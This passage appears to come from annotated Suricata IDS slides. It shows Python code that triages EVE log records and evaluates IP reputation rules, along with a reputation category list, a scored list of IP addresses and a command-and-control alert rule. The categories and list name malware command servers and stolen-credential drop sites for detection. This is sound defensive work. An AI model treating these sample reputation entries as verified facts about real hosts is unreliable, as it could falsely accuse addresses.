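# Three EVE records from the slides (TLS subject/issuer abridged to the identifying RDNs)
# plus one constructed self-signed TLS record and one deliberately malformed line.
SAMPLE_EVE = "\n".join([
    '{"timestamp":"2014-11-18T12:40:42.744230","flow_id":2901423184,"event_type":"fileinfo",'
    '"src_ip":"213.136.29.218","src_port":80,"dest_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",'
    '"http":{"url":"/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb",'
    '"hostname":"nl.archive.ubuntu.com","http_user_agent":"Debian APT-HTTP/1.3 (1.0.1ubuntu2)"},'
    '"fileinfo":{"filename":"/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb",'
    '"magic":"Debian binary package (format 2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff02cd3ded3cf0ce3a42",'
    '"stored":false,"size":5475,"tx_id":2}}',
    '{"timestamp":"2014-11-21T08:11:45.222089","flow_id":2896612328,"event_type":"tls",'
    '"src_ip":"23.206.115.50","src_port":443,"dest_ip":"10.8.0.6","dest_port":47063,"proto":"TCP",'
    '"tls":{"subject":"O=Remember The Milk Inc., CN=www.rememberthemilk.com",'
    '"issuerdn":"O=COMODO CA Limited, CN=COMODO Extended Validation Secure Server CA 2",'
    '"fingerprint":"0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:53:ba:ba:e1:6c:af","version":"TLS 1.2"}}',
    # constructed: self-signed certificate on an old protocol version
    '{"timestamp":"2014-11-21T09:05:10.000000","flow_id":4242,"event_type":"tls",'
    '"src_ip":"198.51.100.7","src_port":443,"dest_ip":"10.8.0.6","dest_port":50001,"proto":"TCP",'
    '"tls":{"subject":"CN=localhost","issuerdn":"CN=localhost",'
    '"fingerprint":"de:ad:be:ef:de:ad:be:ef:de:ad:be:ef:de:ad:be:ef:de:ad:be:ef","version":"TLS 1.0"}}',
    '{"timestamp":"2014-11-21T08:32:22.001162","flow_id":2904615464,"event_type":"netflow",'
    '"src_ip":"23.206.107.75","src_port":443,"dest_ip":"10.8.0.6","dest_port":52556,"proto":"TCP",'
    '"netflow":{"app_proto":"tls","pkts":73,"bytes":66135,"start":"2014-11-21T08:28:08.789426",'
    '"end":"2014-11-21T08:30:19.242083","age":131},'
    '"tcp":{"tcp_flags":"1b","syn":true,"fin":true,"psh":true,"ack":true}}',
    "not json at all",
])

# Constructed indicator set: md5 of the empty string, which no real download will carry.
MD5_BLOCKLIST = {"d41d8cd98f00b204e9800998ecf8427e"}
EXECUTABLE_MAGIC = ("PE32", "ELF", "Mach-O", "MS-DOS executable")


def iter_events(text: str):
    """Yield one dict per EVE line, skipping blank or malformed lines (eve.json is line-delimited)."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def check_fileinfo(ev: dict) -> list[str]:
    fi = ev["fileinfo"]
    reasons = []
    if fi.get("md5") in MD5_BLOCKLIST:
        reasons.append("md5 on blocklist")
    if any(m in fi.get("magic", "") for m in EXECUTABLE_MAGIC):
        reasons.append("executable download: " + fi["magic"])
    return reasons


def check_tls(ev: dict) -> list[str]:
    tls = ev["tls"]
    reasons = []
    if tls.get("subject") == tls.get("issuerdn"):
        reasons.append("self-signed certificate")
    if tls.get("version") not in ("TLS 1.2", "TLS 1.3"):
        reasons.append("legacy TLS version " + str(tls.get("version")))
    return reasons


def check_netflow(ev: dict, max_age: int = 120) -> list[str]:
    nf = ev["netflow"]
    return [f"long-lived {nf.get('app_proto')} flow ({nf['age']}s)"] if nf.get("age", 0) >= max_age else []


CHECKS = {"fileinfo": check_fileinfo, "tls": check_tls, "netflow": check_netflow}


def triage(text: str) -> list[dict]:
    """Run the per-event-type checks over an eve.json stream; one alert dict per reason."""
    alerts = []
    for ev in iter_events(text):
        for reason in CHECKS.get(ev.get("event_type"), lambda _e: [])(ev):
            alerts.append({"flow_id": ev["flow_id"], "src_ip": ev["src_ip"],
                           "dest_ip": ev["dest_ip"], "reason": reason})
    return alerts


def count_by_type(text: str) -> Counter:
    return Counter(ev.get("event_type") for ev in iter_events(text))


if __name__ == "__main__":
    print(dict(count_by_type(SAMPLE_EVE)))
    for a in triage(SAMPLE_EVE):
        print(a)
```

The flow_id field is what ties the three record types together: a fileinfo hit, the TLS handshake that preceded it and the netflow summary written when the flow ends all carry the same id, so a consumer can pivot across them without re-parsing pcap.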


Elasticsearch

Logstash

Kibana

ELK


Passive DNS

Defense


# IP Reputation
#reputation-categories-file: /etc/suricata/iprep/categories.txt
#default-reputation-path: /etc/suricata/iprep
#reputation-files:
# - reputation.list


1,CnC,Malware Command and Control Server
2,Bot,Known Infected Bot
3,Spam,Known Spam Source
4,Drop,Drop site for logs or stolen credentials
5,SpywareCnC,Spyware Reporting Server
6,OnlineGaming,Questionable Gaming Site
7,DriveBySrc,Driveby Source
9,ChatServer,POLICY Chat Server
10,TorNode,POLICY Tor Node
13,Compromised,Known compromised or Hostile
15,P2P,P2P Node
16,Proxy,Proxy Host
17,IPCheck,IP Check Services
19,Utility,Known Good Public Utility
20,DDoSTarget,Target of a DDoS
21,Scanner,Host Performing Scanning
23,Brute_Forcer,SSH or other brute forcer
24,FakeAV,Fake AV and AS Products
25,DynDNS,Domain or IP Related to a Dynamic DNS Entry or Request
26,Undesirable,Undesirable but not illegal
27,AbusedTLD,Abused or free TLD Related
28,SelfSignedSSL,Self Signed SSL or other suspicious encryption
29,Blackhole,Blackhole or Sinkhole systems
30,RemoteAccessService,GoToMyPC and similar remote access services
31,P2PCnC,Distributed CnC Nodes
33,Parking,Domain or SEO Parked
34,VPN,VPN Server
35,EXE_Source,Observed serving executables
37,Mobile_CnC,Known CnC for Mobile specific Family
38,Mobile_Spyware_CnC,Spyware CnC specific to mobile devices
39,Skype_SuperNode,Observed Skype Bootstrap or Supernode
40,Bitcoin_Related,Bitcoin Mining and related
41,DDoSAttacker,DDoS Source


104.28.1.81,34,117
109.98.29.2,21,42
110.4.91.87,35,107
114.49.15.0,2,67
114.79.12.5,2,87
114.99.50.2,21,107
115.68.2.49,24,63
119.6.108.7,23,42
119.81.70.6,23,122
12.23.239.4,21,82
120.83.6.14,23,32
121.7.94.49,15,82
123.0.48.59,15,57
125.69.87.5,21,72
135.23.77.3,21,50
14.3.38.120,23,70
142.0.38.68,2,37


alert ip $HOME_NET any -> any any (msg:"IPREP internal host talking to CnC server"; flow:to_server; iprep:dst,CnC,>,30; sid:1; rev:1;)
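The three files above fit together as follows: categories.txt maps a category name to its id, reputation.list gives each IP a 0..127 score in one or more categories, and the iprep keyword in the rule asks whether the chosen side of the flow has a score in that category satisfying the comparison. An added example, not code from the deck or from Suricata, that loads both files and evaluates the rule's iprep option against flows. The category subset and the first reputation entries are the ones on the slides; because the slide's list has no category-1 (CnC) host at all, a constructed entry for 203.0.113.10 is added so the slide's rule has something to match. Treating `both` as "src and dst must each satisfy the test" is my reading of the keyword.

```python
import ipaddress
import re

# Subset of the slide's categories.txt and reputation.list, in their native formats, plus a
# constructed CnC host (203.0.113.10, listed in two categories) so the slide's rule can fire.
CATEGORIES_TXT = """\
1,CnC,Malware Command and Control Server
2,Bot,Known Infected Bot
15,P2P,P2P Node
21,Scanner,Host Performing Scanning
23,Brute_Forcer,SSH or other brute forcer
24,FakeAV,Fake AV and AS Products
34,VPN,VPN Server
35,EXE_Source,Observed serving executables
"""
REPUTATION_LIST = """\
104.28.1.81,34,117
109.98.29.2,21,42
110.4.91.87,35,107
114.49.15.0,2,67
203.0.113.10,1,90
203.0.113.10,35,20
"""


def parse_categories(text: str) -> dict:
    """name -> id, from 'id,name,description' lines (description may itself contain commas)."""
    cats = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            cid, name, _desc = line.split(",", 2)
            cats[name] = int(cid)
    return cats


def load_reputation(text: str) -> dict:
    """ip -> {category_id: score}; one 'ip,category,score' line per (ip, category), score 0..127."""
    rep = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ip, cid, score = line.split(",")
        ipaddress.ip_address(ip)  # raises ValueError on a malformed address
        score = int(score)
        if not 0 <= score <= 127:
            raise ValueError(f"score out of range: {line}")
        rep.setdefault(ip, {})[int(cid)] = score
    return rep


IPREP_OPT = re.compile(r"^(src|dst|any|both),([A-Za-z0-9_]+),([<>=]),(\d+)$")


def iprep_match(rep: dict, cats: dict, flow: dict, option: str) -> bool:
    """Evaluate an iprep:<side>,<category>,<op>,<value> option against flow {'src': ip, 'dst': ip}.
    A host with no entry in that category has no reputation there and never matches."""
    m = IPREP_OPT.match(option)
    if not m:
        raise ValueError(f"bad iprep option: {option!r}")
    side, cat_name, op, value = m.group(1), m.group(2), m.group(3), int(m.group(4))
    cid = cats[cat_name]

    def host_matches(ip: str) -> bool:
        score = rep.get(ip, {}).get(cid)
        if score is None:
            return False
        return {"<": score < value, ">": score > value, "=": score == value}[op]

    hosts = {"src": [flow["src"]], "dst": [flow["dst"]],
             "any": [flow["src"], flow["dst"]], "both": [flow["src"], flow["dst"]]}[side]
    return all(map(host_matches, hosts)) if side == "both" else any(map(host_matches, hosts))


if __name__ == "__main__":
    cats = parse_categories(CATEGORIES_TXT)
    rep = load_reputation(REPUTATION_LIST)
    for dst in ("203.0.113.10", "104.28.1.81", "8.8.8.8"):
        print(dst, iprep_match(rep, cats, {"src": "10.0.0.5", "dst": dst}, "dst,CnC,>,30"))
```

The threshold in the rule (`>,30`) is where the operator tunes noise: the same host can carry a high VPN score and a low EXE_Source score, and only the category named in the rule is consulted, so a feed entry in the wrong category never fires the CnC rule no matter how high its score.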


https://home.regit.org

Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz (16 cores counting Hyperthreading)

32 GB RAM

Intel 82599EB 10-Gigabit SFI/SFP+ (approx $700)

~ $4,972


Runs 9.6 Gbit/s sustained

9,823 Rules (ET Pro)

<1% Packet Loss


What do you want your IDS to do?

(Awkward pause for ideas/questions)

Contact Information

• Matt Jonkman, [email protected]

• Emerging Threats [email protected]

http://www.emergingthreats.net

http://www.suricata-ids.org

http://openinfosecfoundation.org